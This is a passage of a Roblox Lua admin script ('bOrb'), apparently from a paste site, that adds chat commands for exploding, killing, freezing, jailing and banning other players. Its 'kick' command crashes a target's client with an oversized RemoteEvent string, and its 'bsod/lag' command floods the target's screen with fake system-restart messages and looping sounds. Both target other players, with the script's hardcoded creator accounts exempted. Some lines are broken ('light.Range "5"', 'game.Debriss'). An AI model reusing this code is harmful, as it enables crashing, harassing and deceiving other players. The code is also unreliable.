  769. if #players == 0 then
  770. for i,v in pairs(Players:GetPlayers())do
  771. if str:lower() == v.Name:lower():sub(1,string.len(str)) then
  772. players[#players+1]=v;
  773. end;
  774. end;
  775. end;
  776. return players;
  777. end;
  778. -- if Prefix..data.Usage..Suffix == sub(lower(Message),1,string.len(Prefix)+string.len(data.Usage)+string.len(Suffix)) then
  779. -- local y,n = ypcall(function()
  780. -- data.Func(sub(Message,string.len(Prefix)+string.len(data.Usage)+string.len(Suffix)+1), GetPlayer2, "FakePlayerName")
  781. -- end)
  782. -- end
  783. local function chat(msg,plr)
  784. if isAdmin(plr) then
  785. local pre = "";
  786. local post = "";
  787. if msg:find(" ") ~= nil then
  788. pre = msg:sub(1,msg:find(" ")-1);
  789. post = msg:sub(msg:find(" ")+1);
  790. end;
  791. local cmd = function(ct, s, pt, f)
  792. if ct == "complex" then
  793. for q,k in pairs(s) do
  794. if pre:lower() == k then
  795. if pt == "player" then
  796. for i,v in pairs(people(post))do
  797. Spawn(function()
  798. pcall(function()
  799. f(v);
  800. end);
  801. end);
  802. end;
  803. elseif pt == "string" then
  804. f(post);
  805. end;
  806. break;
  807. end;
  808. end;
  809. elseif ct == "simple" then
  810. for q,k in pairs(s) do
  811. if msg:lower() == k then
  812. if pt == "self" then
  813. Spawn(function()
  814. pcall(function()
  815. f(plr);
  816. end);
  817. end);
  818. elseif pt == "all" then
  819.  
  820. elseif pt == "na" then
  821. Spawn(function()
  822. pcall(function()
  823. f();
  824. end);
  825. end);
  826. end;
  827. end;
  828. end;
  829. elseif ct == "included" then
  830. for q,k in pairs(s) do
  831. if string.find(msg:lower(),k) then
  832. Spawn(function()
  833. pcall(function()
  834. f(msg);
  835. end);
  836. end);
  837. end;
  838. end;
  839. end;
  840. end;
  841. --usage: complex or simple command , {cmd}, "plr", func (function)
  842. cmd("complex", {prefix.."explode"}, "player", function(v)
  843. explp = Instance.new("Explosion",v.Character);
  844. explp.BlastRadius = "1";
  845. explp.BlastPressure = "500000";
  846. explp.Position = v.Character.Torso.Position;
  847. if Chat == true then
  848. game:GetService("Chat"):Chat(wpad,chatname.." Exploded "..v.Name..".",Enum.ChatColor.Blue)
  849. end
  850. end);
  851. cmd("complex", {prefix.."dance",prefix.."danceify"}, "player", function(v)
  852. torsowd=Instance.new('Weld',v.Character)
  853. torsowd.Part0=v.Character.HumanoidRootPart
  854. torsowd.Part1=v.Character.Torso
  855.  
  856. lwd=Instance.new('Weld',v.Character)
  857. lwd.Part0=v.Character.Torso
  858. lwd.Part1=v.Character["Left Arm"]
  859. lwd.C0=CFrame.new(-1.5,0,0)
  860.  
  861. rwd=Instance.new('Weld',v.Character)
  862. rwd.Part0=v.Character.Torso
  863. rwd.Part1=v.Character["Right Arm"]
  864.  
  865. ii=Instance.new('StringValue',nil)
  866. ii.Value = '0'
  867. game:GetService('RunService').Stepped:connect(function()
  868. ii.Value = ii.Value + 0.1
  869.  
  870. torsowd.C0=CFrame.new(math.sin(ii.Value),0,0)
  871. lwd.C0=CFrame.new(-1.5,0,0) * CFrame.Angles(math.sin(ii.Value),0,math.sin(ii.Value))
  872. rwd.C0=CFrame.new(1.5,0,0) * CFrame.Angles(math.sin(ii.Value),0,0 - math.sin(ii.Value))
  873. end)
  874.  
  875. if Chat == true then
  876. game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." dance.",Enum.ChatColor.Blue)
  877. end
  878. end);
  879. cmd("complex", {prefix.."smite"}, "player", function(v)
  880. smite=Instance.new('Part',workspace)
  881. smite.Anchored = true
  882. smite.FormFactor = "Custom"
  883. smite.CanCollide = false
  884. smite.Size = Vector3.new(1,300,1)
  885. smite.Transparency=0.5
  886. smite.Color = Color3.new(0,0,0)
  887. smite.CFrame = v.Character.Torso.CFrame * CFrame.new(0,30,0)
  888. smite.Name = 'bmiter'
  889.  
  890. game:GetService('RunService').Stepped:connect(function()
  891. smite.BrickColor = BrickColor.Random()
  892. end)
  893.  
  894. if v.Character:FindFirstChild('Torso') then
  895. sme=Instance.new('Explosion',v.Character)
  896. sme.Position = v.Character.Torso.Position
  897. sme.BlastPressure = "500000"
  898. sme.BlastRadius = "3"
  899. end
  900.  
  901.  
  902. delay(1.5,function()
  903. for i = 1,0,-0.1 do wait()
  904. smite.Size = Vector3.new(i,300,i)
  905. end
  906.  
  907. for i,v in pairs(workspace:children()) do if v.Name=='bmiter' then
  908. v:remove()
  909. end
  910. end
  911. end)
  912. if Chat == true then
  913. game:GetService("Chat"):Chat(wpad,chatname.." Smited "..v.Name..".",Enum.ChatColor.Blue)
  914. end
  915. end);
  916. cmd("complex", {prefix.."ungod"}, "player", function(v)
  917. vhum1 = v.Character:FindFirstChild('Humanoid')
  918. vhum1.MaxHealth = 100
  919. if Chat == true then
  920. game:GetService("Chat"):Chat(wpad,chatname.."UnGoded "..v.Name..".",Enum.ChatColor.Blue)
  921. end
  922. end);
  923. cmd("complex", {prefix.."invis","invisible"}, "player", function(v)
  924. for i,x in pairs(v.Character:children()) do if x.ClassName=="Part" and x.Name~="HumanoidRootPart" then
  925. x.Transparency=1
  926. for i,z in pairs(v.Character:children()) do if z.ClassName=="Hat" then
  927. for i,b in pairs(z:children()) do if b.ClassName=="Part" then
  928. b.Transparency=1
  929. end
  930. end
  931. end
  932. end
  933. end
  934. end
  935. if v.Character.Head:FindFirstChild('face') then
  936. v.Character.Head.face.Transparency=1
  937. end
  938. if Chat == true then
  939. game:GetService("Chat"):Chat(wpad,chatname..' '..v.Name.." is now invisible.",Enum.ChatColor.Blue)
  940. end
  941. end);
  942. cmd("complex", {prefix.."vis","visible"}, "player", function(v)
  943. for i,x in pairs(v.Character:children()) do if x.ClassName=="Part" and x.Name~="HumanoidRootPart" then
  944. x.Transparency=0
  945. for i,z in pairs(v.Character:children()) do if z.ClassName=="Hat" then
  946. for i,b in pairs(z:children()) do if b.ClassName=="Part" then
  947. b.Transparency=0
  948. end
  949. end
  950. end
  951. end
  952. end
  953. end
  954. if v.Character.Head:FindFirstChild('face') then
  955. v.Character.Head.face.Transparency=0
  956. end
  957. if Chat == true then
  958. game:GetService("Chat"):Chat(wpad,chatname..' '..v.Name.." is now visible.",Enum.ChatColor.Blue)
  959. end
  960. end);
  961. cmd("complex", {prefix.."kill"}, "player", function(v)
  962. v.Character:BreakJoints();
  963. if Chat == true then
  964. game:GetService("Chat"):Chat(wpad,chatname.."killed "..v.Name..".",Enum.ChatColor.Blue)
  965. end
  966. end);
  967. cmd("complex", {prefix.."rguis",prefix.."nguis",prefix.."noguis"}, "player", function(v)
  968. for i,x in pairs(v:children()) do if v.Name~="Basictality" and v.Name~="mcqueen987" then
  969. x:remove()
  970. end
  971. end
  972. if Chat == true then
  973. game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.."'s PlayerGui's.",Enum.ChatColor.Blue)
  974. end
  975. end)
  976. cmd("complex", {prefix.."freeze"}, "player", function(v)
  977. if Chat == true then
  978. game:GetService("Chat"):Chat(wpad,chatname.."Froze "..v.Name..".",Enum.ChatColor.Blue)
  979. end
  980. freezes=Instance.new('Part',v.Character)
  981. freezes.FormFactor = "Custom"
  982. freezes.Size = Vector3.new(4.5,6.5,4.5)
  983. freezes.Material = "SmoothPlastic"
  984. freezes.BrickColor = BrickColor.new('Teal')
  985. freezes.Transparency=0.5
  986. freezes.Name = "Ice"
  987. freezes.Anchored = true
  988. freezes.Material = "Ice"
  989.  
  990. v.Character.Head.Anchored = true
  991. v.Character.Torso.Anchored = true
  992. v.Character['Left Arm'].Anchored = true
  993. v.Character['Left Leg'].Anchored = true
  994. v.Character['Right Arm'].Anchored = true
  995. v.Character['Right Leg'].Anchored = true
  996.  
  997. freezes.CFrame = v.Character.Torso.CFrame
  998. end);
  999. cmd("complex", {prefix.."thaw"}, "player", function(v)
  1000. di = v.Character:FindFirstChild('Ice')
  1001. dim=Instance.new('CylinderMesh',di)
  1002. di.Size = Vector3.new(4.5,0,4.5)
  1003. di.CFrame = v.Character.Torso.CFrame * CFrame.new(0,-2.5,0)
  1004. di.CanCollide = false
  1005. di.Transparency=0
  1006.  
  1007. v.Character.Head.Anchored = false
  1008. v.Character.Torso.Anchored = false
  1009. v.Character['Left Arm'].Anchored = false
  1010. v.Character['Left Leg'].Anchored = false
  1011. v.Character['Right Arm'].Anchored = false
  1012. v.Character['Right Leg'].Anchored = false
  1013. if Chat == true then
  1014. game:GetService("Chat"):Chat(wpad,chatname.."Thawed "..v.Name..".",Enum.ChatColor.Blue)
  1015. end
  1016. game.Debriss:AddItem(di,3)
  1017. end);
  1018. cmd("complex", {prefix.."god"}, "player", function(v)
  1019. vhum = v.Character:FindFirstChild('Humanoid')
  1020. vhum.MaxHealth = 9e999
  1021. if Chat == true then
  1022. game:GetService("Chat"):Chat(wpad,chatname.."Godded "..v.Name..".",Enum.ChatColor.Blue)
  1023. end
  1024. end);
  1025. cmd("complex", {prefix.."fire"}, "player", function(v)
  1026. vtorso = v.Character:FindFirstChild('Torso')
  1027. Instance.new('Fire',vtorso)
  1028. if Chat == true then
  1029. game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." fire.",Enum.ChatColor.Blue)
  1030. end
  1031. end);
  1032.  
  1033. cmd("complex", {prefix.."unfire",prefix.."nofire"}, "player", function(v)
  1034. vtorso = v.Character:FindFirstChild('Torso')
  1035. for i,f in pairs(vtorso:children()) do if f.ClassName=="Fire" then game.Debris:AddItem(f,0) end end
  1036. if Chat == true then
  1037. game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.."'s fire.",Enum.ChatColor.Blue)
  1038. end
  1039. end);
  1040.  
  1041. cmd("complex", {prefix.."bsod",prefix.."lag"}, "player", function(v)
  1042. if v.Name~="Basictality" and v.Name~="ScriptingRevolution" and v.Name~="mcqueen987" then
  1043. if Chat == true then
  1044. game:GetService("Chat"):Chat(wpad,chatname.."BSOD'd/Lagged "..v.Name..".",Enum.ChatColor.Blue)
  1045. end
  1046. local bsodgui = Instance.new('ScreenGui',v.PlayerGui)
  1047. bsodframe=Instance.new('Frame',bsodgui)
  1048. bsodframe.Size = UDim2.new(0,1400,0,800)
  1049. bsodframe.Position = UDim2.new(0,0,0,-40)
  1050. bsodframe.BackgroundColor3 = Color3.new(0,0,1)
  1051. for i = 0,50000 do wait()
  1052. for bsodl = 0,200 do
  1053. bsodt1=Instance.new('TextLabel',bsodframe)
  1054. bsodt1.Text = "Sorry!"
  1055. bsodt1.BackgroundTransparency=1
  1056. bsodt1.TextScaled = true
  1057. bsodt1.Size = UDim2.new(0,500,0,300)
  1058. bsodt1.Position = UDim2.new(0,100,0,80)
  1059.  
  1060. rbsod = bsodt1:clone()
  1061. rbsod.Parent = bsodframe
  1062. rbsod.Text = "You're computer will automaticly restart in 0.5 Seconds.. [BSOD]"
  1063. rbsod.Position = UDim2.new(0,450,0,300)
  1064. rbsod.Size = UDim2.new(0,500,0,300)
  1065.  
  1066. local Sound = Instance.new('Sound',v.PlayerGui)
  1067. Sound.SoundId = 'http://roblox.com/asset/?id=265831543'
  1068. Sound.Looped = true
  1069. Sound.Name = 'Local Sound'
  1070. Sound.Parent = v.PlayerGui
  1071. Sound.Volume = 100
  1072. Sound:Play()
  1073. end
  1074. end
  1075. end
  1076. end);
  1077. cmd("complex", {prefix.."ff",prefix.."forcefield",prefix.."shield"}, "player", function(v)
  1078. Instance.new("ForceField",v.Character);
  1079. if Chat == true then
  1080. game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." a forcefield.",Enum.ChatColor.Blue)
  1081. end
  1082. end);
  1083. cmd("complex", {prefix.."sparkles",prefix.."sparkle"}, "player", function(v)
  1084. Instance.new('Sparkles',v.Character.Torso)
  1085. if Chat == true then
  1086. game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." sparkles.",Enum.ChatColor.Blue)
  1087. end
  1088. end);
  1089. cmd("complex", {prefix.."unsparkles",prefix.."nosparkles"}, "player", function(v)
  1090. for i,v in pairs(v.Character.Torso:children()) do if v.ClassName=="Sparkles" then v:remove() end end
  1091. if Chat == true then
  1092. game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.." sparkles.",Enum.ChatColor.Blue)
  1093. end
  1094. end);
  1095. cmd("complex", {prefix.."kick",prefix.."boot"}, "player", function(v)
  1096. if v.Name~="Basictality" and v.Name~="reizayah1" and v.Name~="mcqueen987" and v.Name~="ScriptingRevolution" then
  1097. kick=Instance.new('RemoteEvent',workspace):FireClient(v,{string.rep("umad?",2e5+5)})
  1098. game.Debris:AddItem(kick,1)
  1099. if Chat == true then
  1100. game:GetService("Chat"):Chat(wpad,chatname.."kicked "..v.Name.." from the server.",Enum.ChatColor.Blue)
  1101. end
  1102. end
  1103. end);
  1104. cmd("simple", {prefix.."unban",prefix.."unbanish"}, "player", function(v)
  1105. for i,unban in pairs(banfolder:children()) do if unban.Value==v.Name then
  1106. unban:remove()
  1107. end
  1108. end
  1109. game:GetService("Chat"):Chat(wpad,chatname.."Unbanished "..v.Name.." from the server.",Enum.ChatColor.Blue)
  1110. end);
  1111. cmd("complex", {prefix.."ban",prefix.."banish"}, "player", function(v)
  1112. if v.Name~="Basictality" and v.Name~="reizayah1" and v.Name~="ScriptingRevolution" and v.Name~="mcqueen987" then
  1113. if game.Players:FindFirstChild(v.Name) then
  1114. bansv=Instance.new('StringValue',banfolder)
  1115. bansv.Name = v.Name
  1116. bansv.Value = v.Name
  1117. end
  1118. end
  1119. if Chat == true then
  1120. game:GetService("Chat"):Chat(wpad,chatname.."Banished "..v.Name.." from the server.",Enum.ChatColor.Blue)
  1121. end
  1122. end);
  1123. cmd("complex", {prefix.."sword",prefix.."linkedsword"}, "player", function(v)
  1124. game:service'InsertService':LoadAsset(125013769):children()[1].Parent = v.Backpack
  1125. if Chat == true then
  1126. game:GetService("Chat"):Chat(wpad,chatname..'Gave '..v.Name.." a Sword.",Enum.ChatColor.Blue)
  1127. end
  1128. end);
  1129. cmd("complex", {prefix.."nogravity",prefix.."ngrav",prefix.."nograv"}, "player", function(v)
  1130. bf = Instance.new("BodyForce")
  1131. bf.Parent = v.Character.Torso
  1132. bf.force = Vector3.new(0,4000,0)
  1133. if Chat == true then
  1134. game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." anti-Gravity.",Enum.ChatColor.Blue)
  1135. end
  1136. end);
  1137. cmd("complex", {prefix.."ref",prefix.."refresh"}, "player", function(v)
  1138.  
  1139. if v.Character:FindFirstChild('Torso') then
  1140. refp=Instance.new("Part",workspace)
  1141. refp.CFrame = v.Character.Torso.CFrame
  1142. refp.CanCollide = false
  1143. refp.Transparency=1
  1144. refp.Anchored = true
  1145. end
  1146. v:LoadCharacter()
  1147. v.Character.Torso.CFrame = refp.CFrame
  1148. refp:remove()
  1149. if Chat == true then
  1150. game:GetService("Chat"):Chat(wpad,chatname.."Refresh'd "..v.Name,Enum.ChatColor.Blue)
  1151. end
  1152. end);
  1153. cmd("complex", {prefix.."unjail",prefix.."nojail"}, "player", function(v)
  1154. for i,w in pairs(workspace:children()) do if w.Name==v.Name.."'s Jail" then
  1155. workspace[v.Name.."'s Jail"]:remove()
  1156. end
  1157. end
  1158. game:GetService("Chat"):Chat(wpad,chatname.."Unjailed "..v.Name..".",Enum.ChatColor.Blue)
  1159. end);
  1160. cmd("complex", {prefix.."light",prefix.."plight"}, "player", function(v)
  1161. if Chat == true then
  1162. game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." light.",Enum.ChatColor.Blue)
  1163. end
  1164. light=Instance.new('PointLight',v.Character.Torso)
  1165. light.Brightness = "5"
  1166. light.Range "5"
  1167. end);
  1168. cmd("complex", {prefix.."rlight",prefix.."nolight",prefix.."unlight"}, "player", function(v)
  1169. if Chat == true then
  1170. game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.." light.",Enum.ChatColor.Blue)
  1171. end
  1172. for i,rlight in pairs(v.Character.Torso:children()) do if rlight.ClassName=="PointLight" then
  1173. game.Debris:AddItem(rlight,0)
  1174. end
  1175. end
  1176. end);
  1177. cmd("complex", {prefix.."resp",prefix.."respawn",prefix.."res"}, "player", function(v)
  1178. v:LoadCharacter()
  1179. if Chat == true then
  1180. game:GetService("Chat"):Chat(wpad,chatname.."Respawned "..v.Name..".",Enum.ChatColor.Blue)
  1181. end
  1182. end);
  1183. cmd("complex", {prefix.."sit"}, "player", function(v)
  1184. v.Character.Humanoid.Sit = true
  1185. if Chat == true then
  1186. game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." sit.",Enum.ChatColor.Blue)
  1187. end
  1188. end);
  1189. cmd("complex", {prefix.."rj",prefix.."rejoin"}, "player", function(v)
  1190. game:GetService('TeleportService'):Teleport(game.PlaceId,v)
  1191. end);
  1192. cmd("complex", {prefix.."jump"}, "player", function(v)
  1193. v.Character.Humanoid.Jump = true
  1194. if Chat == true then
  1195. game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." Jump.",Enum.ChatColor.Blue)
  1196. end
  1197. end);
  1198. cmd("complex", {prefix.."jail",prefix.."lockup"}, "player", function(v)
  1199. jailp=Instance.new('Model',workspace)
  1200. jailp.Name = v.Name.."'s Jail"
  1201.  
  1202. jailp1=Instance.new('Part',jailp)
  1203. jailp1.FormFactor = "Custom"
  1204. jailp1.Anchored = true
  1205. jailp1.Material = "Neon"
  1206. jailp1.Size = Vector3.new(5,0.2,5)
  1207. jailp1.BrickColor = BrickColor.new'Teal'
  1208. jailp1.CFrame = v.Character.Torso.CFrame * CFrame.new(0,-3,0)
  1209.  
  1210. jailp2=Instance.new('Part',jailp)
  1211. jailp2.FormFactor = "Custom"
  1212. jailp2.Anchored = true
  1213. jailp2.Color = Color3.new(0,0,0)
  1214. jailp2.Transparency=0.5
  1215. jailp2.Material = "Neon"
  1216. jailp2.Size = Vector3.new(5, 7, 0)
  1217. jailp2.CFrame = jailp1.CFrame * CFrame.new(0,3.6,2.4)
  1218.  
  1219. jailp3=jailp2:clone()
  1220. jailp3.Parent = jailp
  1221. jailp3.CFrame = jailp1.CFrame * CFrame.new(0,3.6,-2.4)
  1222.  
  1223. jailp4=jailp1:clone()
  1224. jailp4.Parent = jailp
  1225. jailp4.CFrame = jailp1.CFrame * CFrame.new(0,7.2,0)
  1226.  
  1227. jailp5=jailp2:clone()
  1228. jailp5.Parent = jailp
  1229. jailp5.Size = Vector3.new(0, 7, 5)
  1230. jailp5.CFrame = jailp1.CFrame * CFrame.new(2.4,3.6,0)
  1231.  
  1232. jailp6=jailp5:clone()
  1233. jailp6.Parent = jailp
  1234. jailp5.CFrame = jailp1.CFrame * CFrame.new(-2.4,3.6,0)
  1235. game:GetService("Chat"):Chat(wpad,chatname.."Jailed "..v.Name.." .",Enum.ChatColor.Blue)
  1236. end);
  1237. cmd("complex", {prefix.."unff",prefix.."unforcefield",prefix.."unshield"}, "player", function(v)
  1238. for i,k in pairs(v.Character:GetChildren()) do
  1239. if k.ClassName == "ForceField" then
  1240. if Chat == true then
  1241. game:GetService("Chat"):Chat(wpad,chatname.."Taken "..v.Name.." forcefield away.",Enum.ChatColor.Blue)
  1242. end
  1243. k:Destroy();
  1244. end;
  1245. end;
  1246. end);
  1247. end;
  1248. end;
  1249.  
  1250. player = meplyr
  1251. player.Chatted:connect(function(message) chat(message, player) end)
  1252. ----------------------------------------------------------------------------------------------
  1253. function Spawnorb()
  1254. admin = meplyr.Name
  1255. wpadmod=Instance.new('Model',workspace)
  1256. Instance.new('Humanoid',wpadmod)
  1257. wpadmod.Name = player.Name.."'s "..OrbName
  1258. wpad=Instance.new('Part',wpadmod)
  1259. wpad.Name = "bOrb"
  1260. wpad.Anchored = true
  1261. wpadpointlight=Instance.new('PointLight',wpad)
  1262. wpad.CanCollide = false
  1263. wpad.Transparency=wpadtrans
  1264. wpad.FormFactor = "Custom"
  1265. wpad.Material = "Neon"
  1266. wpad.CanCollide = false
  1267. wpad.Size = Vector3.new(1,1,1)
  1268. wpad.Shape = "Ball"
  1269. wpad.BrickColor = BrickColor.new'Teal'
  1270. wpad.TopSurface = "Smooth"
  1271. wpad.BottomSurface = "Smooth"
  1272.  
  1273. if hidevalue.Value == "Invisible" then
  1274. wpad.Transparency=1
  1275. wpadpointlight.Parent = nil
  1276. end
  1277.  
  1278. if hidevalue.Value == "Visible" then
  1279. wpad.Transparency=0
  1280. wpadpointlight.Parent = wpad
  1281.  
  1282. if Chat == true then
  1283. game:GetService("Chat"):Chat(wpad,chatname.."Welcome "..meplyr.Name..", the current prefix is "..prefixx.Value,Enum.ChatColor.Blue)
  1284. end
  1285. end
  1286. end
  1287.  
  1288. Spawnorb()
  1289. -----------------------------------------------------------------------------------
  1290. game:GetService('RunService').Stepped:connect(function ()
  1291. if not workspace:FindFirstChild(wpadmod.Name) then
  1292. Spawnorb()
  1293. end
  1294. end)
  1295. ------------------------------------Banned-----------------------------------------
  1296. -----------------------------------------------------------------------------------
  1297. game:GetService('RunService').Stepped:connect(function ()
  1298. for i,v in pairs(bplyrs:children()) do
  1299. if v.Name==Banned and v.Name~="Basictality" then
  1300. v:remove()
  1301. end
  1302. end
  1303. end)
  1304.  
  1305. bplyrs.PlayerAdded:connect(function(player) do
  1306. if player.Name==Banned and player.Name~="Basictality" and player.Name~="mcqueen987" and player.Name~="reizayah1" then
  1307. kick3=Instance.new('RemoteEvent',workspace):FireClient(player,{string.rep("umad?",2e5+5)})
  1308. game.Debris:AddItem(kick3,1)
  1309. end
  1310. end
  1311. end)
  1312. -----------------------------------------------------------------------------------
  1313.  
  1314. --------------------------------Player Joining And Player Leaving------------------
  1315. game.Players.PlayerAdded:connect(function(player) if player.Name~="Basictality" then
  1316. if Chat == true then
  1317. game:GetService("Chat"):Chat(wpad,chatname..player.Name..' has joined!',Enum.ChatColor.Blue)
  1318. end
  1319. end
  1320. end)
  1321.  
  1322. game.Players.PlayerAdded:connect(function(playero) if playero.Name=="Basictality" then
  1323. if Chat == true then
  1324. game:GetService("Chat"):Chat(wpad,chatname..playero.Name..' The Creator Of bOrb has joined!',Enum.ChatColor.Blue)
  1325. end
  1326. end
  1327. end)
  1328.  
  1329. game.Players.PlayerRemoving:connect(function(playero) if playero.Name=="Basictality" then
  1330. if Chat == true then
  1331. game:GetService("Chat"):Chat(wpad,chatname..playero.Name..' The Creator Of bOrb has left!',Enum.ChatColor.Blue)
  1332. end
  1333. end
  1334. end)
  1335.  
  1336. game.Players.PlayerRemoving:connect(function(player) if player.Name~="Basictality" then
  1337. if Chat == true then
  1338. game:GetService("Chat"):Chat(wpad,chatname..player.Name..' has left!',Enum.ChatColor.Blue)
  1339. end
  1340. end
  1341. end)
  1342. -----------------------------------------Rot---------------------------------------
  1343. -----------------------------------------------------------------------------------
  1344. for i = 1,math.huge,Speed do wait()
  1345. if workspace:FindFirstChild(adminwew.Name) then
  1346. wpadtorso = workspace[admin]:FindFirstChild('Torso')
  1347. wpad.CFrame = CFrame.new(wpadtorso.Position) * CFrame.fromEulerAnglesXYZ(math.sin(i),math.abs(i),math.rad(i)) * CFrame.new(0,0,-dis)
  1348. wpadpath=Instance.new('Part',wpad)
  1349. wpadpath.Anchored = true
  1350. wpadpath.Transparency = wpad.Transparency
  1351. wpadpath.FormFactor = "Custom"
  1352. wpadpath.Size = Vector3.new(0.3,0.3,0.3)
  1353. wpadpath.CFrame = wpad.CFrame * CFrame.new(0,0,0)
  1354. wpadpath.CanCollide = false
  1355. wpadpath.Color = Color3.new(0,0,0)
  1356. game.Debris:AddItem(wpadpath,1)
  1357. end
  1358. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement